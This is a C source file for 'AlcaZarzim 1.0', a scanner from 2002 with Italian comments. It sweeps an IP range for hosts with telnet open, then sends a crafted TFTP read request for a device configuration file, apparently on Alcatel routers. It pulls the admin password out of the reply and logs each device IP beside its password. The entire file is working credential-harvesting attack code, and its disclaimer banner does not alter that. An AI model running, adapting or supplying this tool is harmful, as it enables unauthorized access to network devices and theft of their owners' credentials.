/* alcazarzim */ /* $Id: alcazarzim.c,v 1.1.1.1 2002/04/13 16:16:08 neuro Exp $ */ #include #include #include #include #include #include #include #include #include #include #include #define BUFFER_SIZE 516 struct sockaddr sa; struct sockaddr *from; struct sockaddr_in *p; int len; int fd; int sent,recvd; unsigned long start_ip, end_ip, count; char pass[32]; char str[10]; FILE *logfile; struct timeval minutetimeout; int TIMEOUT; int i, found; int numhost=0, numfound=0; double per; u_char data2recv[BUFFER_SIZE]; u_char data2sent[26]={ 0x00, 0x01, 'a', 'c', 't', 'i', 'v', 'e', '/', 's', 'y', 's', 't', 'e', 'm', '.', 'i', 'n', 'i', 0x00, 'o', 'c', 't', 'e', 't', 0x00 }; // pacchetto predefinito di tftp RRQ // funzioni di timeout per il check della telnet e del tftp // potrebbero essere accorpate, ma non sono sicuro se close() // sia la cosa migliore nel caso non si usi connect() void func_alarm_tftp (int s) { close(fd); return; } void func_alarm_telnet (int s) { close(fd); return; } // funzione predefinita di intercettazione dei segnali di kill & co void exitnow () { close(fd); numhost=count-ntohl(start_ip); per=(double)(((double)numfound/(double)numhost)*100); fprintf(logfile,"\n statistics.. (mmh.. interrupted by user)"); fprintf(logfile,"\n host scanned: %d", numhost); fprintf(logfile,"\n found : %d", numfound); fprintf(logfile,"\n percentage : %0.3f\%%", per); fprintf(logfile,"\n\n------------------------------------------------------------\n"); fclose(logfile); printf("\n\nscan completed (interrupted by user)."); printf("\n\nauthor: noxious@olografix.org - thank you for using. byez.\n\n"); exit(2); } // funzione di check della porta 23. // tenta semplicemente una connect() che allo scadere del timeout // viene chiusa con close() (vedi sopra) int checktelnet (unsigned long ip) { p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; p->sin_port=htons(23); p->sin_addr.s_addr= htonl(ip); minutetimeout.tv_sec = TIMEOUT; minutetimeout.tv_usec = 0; fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); signal(SIGALRM,func_alarm_telnet); alarm(TIMEOUT); if (connect (fd, (struct sockaddr *) &sa, sizeof(sa))) { alarm(0); signal(SIGALRM,SIG_DFL); return (-1); // caso del timeout } alarm(0); signal(SIGALRM,SIG_DFL); close(fd); return (0); // caso di porta aperta } // questa funzione spedisce un RRQ direttamente sulla porta 69 dell' host. // NON implementa tutto il protocollo tftp. una volta ricevuto il primo // pacchetto (max 512 byte del file), non invia i previsti ack (a noi // non serve tutto il file) int checktftp (unsigned long ip) { p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; p->sin_port=htons(69); p->sin_addr.s_addr= htonl(ip); minutetimeout.tv_sec = TIMEOUT; minutetimeout.tv_usec = 0; bzero (data2recv, sizeof (data2recv)); fd=socket(AF_INET,SOCK_DGRAM,0); sent=sendto(fd,&data2sent,26,0,(struct sockaddr*)p,sizeof(struct sockaddr)); // data2sent e' definito sopra signal(SIGALRM, func_alarm_tftp); alarm(TIMEOUT); if (recvfrom(fd,data2recv,BUFFER_SIZE,0,from,&len)<=0) { alarm(0); signal(SIGALRM,SIG_DFL); bzero (data2recv, sizeof (data2recv)); return(-1); // caso del timeout // telnet aperta e tftp chiuso.. e' un alcatel? // verificare e in caso positivo usare l'EXPERT mode } alarm(0); signal(SIGALRM,SIG_DFL); if (data2recv[1]==5) { return(2); // tftp aperto ma file non esistente (ERR=5) } if (data2recv[1]==3) { printf("tftp open..parsing file.."); bzero (pass, sizeof (pass)); if (data2recv[4]!='s') { return(1); // file vuoto, password blank } else { for (i=0; i<32; i++) { pass[i]=data2recv[i+16]; } return(0); // (lo so, lo so, un memcpy no? :) } } return(0); } void usage (char *cmd) { printf("\n.: AlcaZarzim 1.0 :.\n"); printf("\nusage: %s \n\n", cmd); exit(1); } int main(int argc, char *argv[]) { struct in_addr host; if (argc!=5) { usage(argv[0]); } else { start_ip=inet_addr(argv[1]); end_ip=inet_addr(argv[2]); TIMEOUT = atoi(argv[3]); } signal(SIGINT, exitnow); signal(SIGTERM, exitnow); signal(SIGKILL, exitnow); signal(SIGQUIT, exitnow); printf ("\n.: AlcaZarzim 1.0 :.\n"); printf ("\nby [noxious] - ALL illegal and/or unhautorized use are prohibited!\n"); printf ("\nopening file %s..", argv[4]); if ((logfile=fopen(argv[4], "a+"))) { printf ("ok.\n"); } else { printf ("error.\n"); fclose(logfile); exit(3); } fprintf (logfile,"\n.: AlcaZarzim 1.0 - log file :.\n"); fprintf (logfile,"\n start ip = %s", argv[1]); fprintf (logfile,"\n end ip = %s", argv[2]); fprintf (logfile,"\n timeout = %s sec.\n", argv[3]); fprintf (logfile,"\n [device ip]\t\t[password]\n\n"); // main loop for (count=ntohl(start_ip); count<=ntohl(end_ip); count++) { host.s_addr=ntohl(count); printf("\nhost %s..", inet_ntoa(host)); fflush(stdout); if (checktelnet(count)==0) { found=checktftp(count); if (found==0) { printf ("password found!"); fprintf(logfile, " %s\t\t%s", inet_ntoa(host), pass); numfound++; } if (found==1) { printf ("blank password?"); fprintf(logfile, " %s\t\tblank password?\n", inet_ntoa(host)); numfound++; } if (found==2) { printf ("tftp open..error download (patched firmware?)"); fprintf(logfile, " %s\t\terror (patched?)\n", inet_ntoa(host)); } if (found==-1) { printf ("tftp closed (alcatel? use EXPERT)."); fprintf(logfile, " %s\t\ttftp closed (alcatel? use EXPERT)\n", inet_ntoa(host)); numfound++; } } else { printf ("telnet closed."); // telnet chiusa, checktftp() inutile } } numhost=count-ntohl(start_ip); per=(double)(((double)numfound/(double)numhost)*100); fprintf(logfile,"\n statistics.."); fprintf(logfile,"\n host scanned: %d", numhost); fprintf(logfile,"\n found : %d", numfound); fprintf(logfile,"\n percentage : %0.3f\%%", per); fprintf(logfile,"\n\n------------------------------------------------------------\n"); fclose (logfile); printf("\n\nstatistics.."); printf("\nhost scanned: %d", numhost); printf("\nfound : %d", numfound); printf("\npercentage : %0.3f\%%", per); printf("\n\nscan completed."); printf("\n\nauthor: noxious@olografix.org - thank you for using. byez.\n\n"); return(0); }